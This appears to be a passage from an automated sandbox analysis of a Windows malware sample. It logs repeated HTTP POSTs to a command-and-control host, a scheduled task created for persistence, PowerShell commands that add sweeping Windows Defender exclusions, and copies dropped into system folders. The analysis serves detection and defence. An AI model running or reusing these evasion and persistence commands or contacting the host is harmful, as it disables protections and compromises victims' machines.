HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 1948Expect: 100-continueConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 540Expect: 100-continue |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: multipart/form-data; boundary=----MPho9DAeco10vW2pgPLJfMXn3NFOjUpHuhUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2978Expect: 100-continue |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 1948Expect: 100-continueConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 1948Expect: 100-continueConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 1948Expect: 100-continueConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 1932Expect: 100-continueConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 1948Expect: 100-continueConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2520Expect: 100-continueConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 1948Expect: 100-continueConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2520Expect: 100-continueConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 1948Expect: 100-continueConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2520Expect: 100-continueConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 1948Expect: 100-continueConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue |
Source: global traffic |
HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive |
Source: unknown |
Process created: C:\Users\user\Desktop\9XHFe6y4Dj.exe "C:\Users\user\Desktop\9XHFe6y4Dj.exe" |
|
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tmiybkuk\tmiybkuk.cmdline" |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9645.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCBECAF1EB4DD4ACB9C3DAD38B7F1421.TMP" |
|
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbljmznv\hbljmznv.cmdline" |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES97EB.tmp" "c:\Windows\System32\CSC6D484021F1A3499F944D7EA066CF3EF7.TMP" |
|
Source: unknown |
Process created: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe "C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe" |
|
Source: unknown |
Process created: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe "C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe" |
|
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "9XHFe6y4Dj9" /sc MINUTE /mo 8 /tr "'C:\Users\user\Desktop\9XHFe6y4Dj.exe'" /rl HIGHEST /f |
|
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' |
|
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/' |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/' |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/' |
|
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/' |
|
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/' |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/' |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/' |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/' |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/' |
|
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe' |
|
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\tqeRXJHxPWPPoiNqjJeEYdv.exe' |
|
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\tqeRXJHxPWPPoiNqjJeEYdv.exe' |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\Platform\tqeRXJHxPWPPoiNqjJeEYdv.exe' |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe' |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9XHFe6y4Dj.exe' |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lE7emhVBWP.bat" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: unknown |
Process created: C:\Users\user\Desktop\9XHFe6y4Dj.exe C:\Users\user\Desktop\9XHFe6y4Dj.exe |
|
Source: unknown |
Process created: C:\Users\user\Desktop\9XHFe6y4Dj.exe C:\Users\user\Desktop\9XHFe6y4Dj.exe |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\chcp.com chcp 65001 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 |
|
Source: unknown |
Process created: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe "C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\user\Desktop\9XHFe6y4Dj.exe "C:\Users\user\Desktop\9XHFe6y4Dj.exe" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding |
|
Source: unknown |
Process created: C:\Users\user\Desktop\9XHFe6y4Dj.exe "C:\Users\user\Desktop\9XHFe6y4Dj.exe" |
|
Source: unknown |
Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS |
|
Source: unknown |
